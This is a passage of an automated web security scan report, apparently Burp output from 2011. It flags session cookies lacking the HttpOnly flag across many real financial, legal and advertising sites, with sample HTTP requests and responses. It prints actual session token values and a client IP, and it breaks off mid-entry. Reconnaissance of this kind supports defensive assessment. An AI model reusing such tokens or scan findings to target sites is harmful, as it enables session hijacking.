http://www.moritthock.com/index.php/representative_transactions
http://www.moritthock.com/index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc
http://www.nytimes.com/adx/bin/adx_remote.html
http://www.porterwright.com/
http://www.porterwright.com/favicon.ico
https://www.wellsfargo.com/jump/theprivatebank/index

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

14.1. https://ams-legal.net/support/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/support/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.2. https://ams-legal.net/tuckerellis/Image.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/Image.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.3. https://ams-legal.net/tuckerellis/Login.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/Login.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.4. https://ams-legal.net/tuckerellis/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.5. https://ams-legal.net/tuckerellis/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ams-legal.net
Path:	/tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.6. http://axley.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://axley.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9F000B72936C899EC0768471D81E1100; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: axley.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

14.7. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/cgi-bin/counter.PicCount

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2A91EB108D080C11C3E7AA2D05A34652.231150A3; Path=/cgi-bin

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/counter.PicCount?userid=AENDU0IN29GG&bgc=0A2447&fgc=FFFFFF&fn=Horizon&fs=20&fs=14&digits=7&gif=yes&type=trans HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:40 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Set-Cookie: JSESSIONID=2A91EB108D080C11C3E7AA2D05A34652.231150A3; Path=/cgi-bin
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
P3P: CP="NOI COR CURa INT"
Content-Length: 44

GIF89a.............!.......,...........D...;

14.8. http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cgiwsc.enhancedsitebuilder.com
Path:	/extras/public/formular.cls/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rauth.session=10f685eb770f8444e1de8e677b5be537; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extras/public/formular.cls/show?cc=0.7596080219373107&accountId=AENDU0IN29GG&instanceId=25529&LC=en_US HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:50 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Set-Cookie: rauth.session=10f685eb770f8444e1de8e677b5be537; Path=/
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 6157

keepMeAlive = new Keepalive("http://cgiwsc.enhancedsitebuilder.com/extras/public/keepalive.gif");

document.write("<form id=\"formular\" name=\"formular\" method=\"post\" onSubmit=\"return formula
...[SNIP]...

14.9. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SessionData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL1ODi4vzMoDyGQWYGls5OjsZObgYWRq5GAE5xk2YO; domain=.overture.com; path=/; expires=Thu, 12-May-2011 11:20:00 GMT
UserData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL4tCQVIZRZgaWzk6Oxk5uBhZGrkYATspeIQ0%3D; domain=.overture.com; path=/; expires=Sun, 09-May-2021 11:15:00 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.10. http://cpadominator.com/campaigns/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cpadominator.com
Path:	/campaigns/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=c13141a89a788eb38ce9b892c430d1bb; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaigns/index.php?g=cxnsw&kw=ym HTTP/1.1
Host: cpadominator.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:02:05 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c13141a89a788eb38ce9b892c430d1bb; path=/
Set-Cookie: splatcookie[id]=102; expires=Wed, 31-Aug-2011 14:42:05 GMT
Set-Cookie: splatcookie[group]=154; expires=Wed, 31-Aug-2011 14:42:05 GMT
Location: http://myonlinearcade.com/survey/c/indexns.html
Content-Type: text/html
Content-Length: 0

14.11. http://foxbusiness.disqus.com/thread.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://foxbusiness.disqus.com
Path:	/thread.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=5439c19bf65868637b6d94bd5708f992; Domain=.disqus.com; expires=Thu, 26-May-2011 11:39:08 GMT; Max-Age=1209600; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.12. http://generalatlantic.com/en/team/overview previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://generalatlantic.com
Path:	/en/team/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_ga_session=BAh7CDoLcmVnaW9uIg1BbWVyaWNhczoLbG9jYWxlIgdlbiIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--8393d076db3871a91209949e85bda4abfffada2d; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/team/overview HTTP/1.1
Host: generalatlantic.com
Proxy-Connection: keep-alive
Referer: http://generalatlantic.com/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=34463671.1305198053.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=34463671.349629096.1305198053.1305198053.1305198053.1; __utmc=34463671; __utmb=34463671.1.10.1305198053

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:07:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: _ga_session=BAh7CDoLcmVnaW9uIg1BbWVyaWNhczoLbG9jYWxlIgdlbiIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--8393d076db3871a91209949e85bda4abfffada2d; path=/
Status: 200 OK
X-Runtime: 0.15600
ETag: "723c5e4449f969abdccd57b7659005ff"
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 15384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta
...[SNIP]...

14.13. http://m1463.ic-live.com/572/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://m1463.ic-live.com
Path:	/572/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C73A01F5BEE38ED2F3A801AA8E6D7816.mch1-rdr-3; Path=/
ngx_userid=173.193.214.243:1305198193830; Domain=.ic-live.com; Expires=Sat, 11-May-2013 11:03:13 GMT; Path=/
pid2=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Expires=Fri, 11-May-2012 11:03:13 GMT; Path=/
sid1463=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Path=/
cvt572=105989004; Domain=.ic-live.com; Expires=Sat, 11-Jun-2011 11:03:13 GMT; Path=/
ngx_105989004=2011-05-12:04:03:13; Domain=.ic-live.com; Expires=Fri, 13-May-2011 11:03:13 GMT; Path=/
Coyote-2-a21011e=a210185:0; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.14. https://personal.vanguard.com/us/funds/snapshot previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://personal.vanguard.com
Path:	/us/funds/snapshot

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.15. http://privatemoneytalk.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.16. http://revelations.trovus.co.uk/tracker/542.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://revelations.trovus.co.uk
Path:	/tracker/542.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

revelations_site_542_visitor_session_uuid=BAgiKTJiOTA4Mjc0LWY3ZWQtNGZmOS1hMWUwLWZkYWZmNWQwYTJlZA%3D%3D--37fe93879173079047058b95fc48f2b0387aa96a; path=/; expires=Thu, 12-May-2011 11:18:41 GMT
revelations_visitor_md5=BAgiJTBkNzkyYTZmZDJhZTgzZWU2MDliYzc1Yzk5M2RkZmU1--1a7bf469dc59bc16efca73254c0b6b3e818e6386; path=/; expires=Thu, 12-May-2016 11:03:41 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tracker/542.gif?j=1&w=1920&r=&t=FT.com%20%2F%20In%20depth%20%2F%20Private%20equity&u=http%3A%2F%2Fwww.ft.com%2Findepth%2Fprivateequity&wtf=1305198191 HTTP/1.1
Host: revelations.trovus.co.uk
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 11:03:41 GMT
Content-Type: image/gif
Connection: keep-alive
Status: 200 OK
P3P: CP="NOI CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT"
Last-Modified: Fri, 13 Aug 2010 21:06:45 GMT
Content-Disposition: inline
Content-Length: 35
Set-Cookie: revelations_visitor_md5=BAgiJTBkNzkyYTZmZDJhZTgzZWU2MDliYzc1Yzk5M2RkZmU1--1a7bf469dc59bc16efca73254c0b6b3e818e6386; path=/; expires=Thu, 12-May-2016 11:03:41 GMT
Set-Cookie: revelations_site_542_visitor_session_uuid=BAgiKTJiOTA4Mjc0LWY3ZWQtNGZmOS1hMWUwLWZkYWZmNWQwYTJlZA%3D%3D--37fe93879173079047058b95fc48f2b0387aa96a; path=/; expires=Thu, 12-May-2011 11:18:41 GMT
Cache-Control: no-cache

GIF89a.............,...........D..;

14.17. https://secure.reportingsystem.com/TPG/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.reportingsystem.com
Path:	/TPG/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=2712786;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
CFTOKEN=81013834;expires=Sat, 04-May-2041 11:24:35 GMT;path=/
JSESSIONID=4830b14a24305d117a65TR;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.18. https://services.sungarddx.com/common/js/AdminFunctions.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/common/js/AdminFunctions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.19. https://services.sungarddx.com/js/source.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/js/source.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQBBSCRR=DAGLHBFBNBLDAFJEJOEBHHML; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.20. http://trc.taboolasyndication.com/bloomberg/trc/2/json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/bloomberg/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

taboola_session_id=v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1305200272_1305200272;Path=/bloomberg/
JSESSIONID=.prod2-f3;Path=/
taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0;Path=/;Expires=Fri, 11-May-12 11:37:52 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:52 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0;Path=/;Expires=Fri, 11-May-12 11:37:52 GMT
Set-Cookie: taboola_session_id=v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1305200272_1305200272;Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:37:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 6664

trc_json_response =
{"trc":{"req":"9aa75fd4081f69b5978bd39a0832d6cc","session-id":"96312820aedf9fdd5216e070e722f405","session-data":"v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

14.21. https://webmail-us.mimecast.com/webMail/login.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://webmail-us.mimecast.com
Path:	/webMail/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A558B2D6AC4AE657DD0F627D7073BB13; Path=/webMail; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webMail/login.jsp HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

14.22. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://webmail.tuckerellis.com
Path:	/exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=15a97208-bb3b-4ddc-80a0-5c9c656a7d79; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.23. https://ww3.janus.com/advisor/about-janus previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/about-janus

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
vj-ww3-advisor=3557560492.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.24. http://www.ams-legal.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ams-legal.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCDBQTBR=GNMNHADBFLOMMFBCGBHFLNHO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ams-legal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4920
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCDBQTBR=GNMNHADBFLOMMFBCGBHFLNHO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

14.25. http://www.apolloic.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.apolloic.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCDBARRT=DFIJJBNBJJANFCMBIGHMAEIC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.apolloic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Date: Thu, 12 May 2011 11:40:50 GMT
Content-Length: 136
Content-Type: text/html
Location: public/home.asp
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCCDBARRT=DFIJJBNBJJANFCMBIGHMAEIC; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="public/home.asp">here</a>.</body>

14.26. http://www.conferenceservers.com/browser/proxy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.conferenceservers.com
Path:	/browser/proxy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browser/proxy.asp HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Content-Length: 843
Content-Type: text/html
Cache-Control: private
Date: Thu, 12 May 2011 12:25:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN; path=/

// WebDialogs WebInterpoint Client Login Utilities
// This file contains functions which are commonly used by login pages.

var proxy='173.193.214.243'; // This value was detected server side
fu
...[SNIP]...

14.27. http://www.dmoc.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dmoc.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS97997ab7f65dbfa3475cc6e258e81de7=959b2d7543b91794550623991d8a8d37; expires=Sat, 04-Jun-2011 15:53:02 GMT; path=/; domain=.dmoc.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.28. http://www.elawmarketing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.elawmarketing.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS12e590b5abdc44fd41146e46388173a1=c8f73722530b0816abc1b10d32d412d7; expires=Sat, 04-Jun-2011 15:33:34 GMT; path=/; domain=.elawmarketing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.29. http://www.huroncapital.com/secure/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.huroncapital.com
Path:	/secure/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.30. http://www.kkr.com/company/landmark_achievements.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kkr.com
Path:	/company/landmark_achievements.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

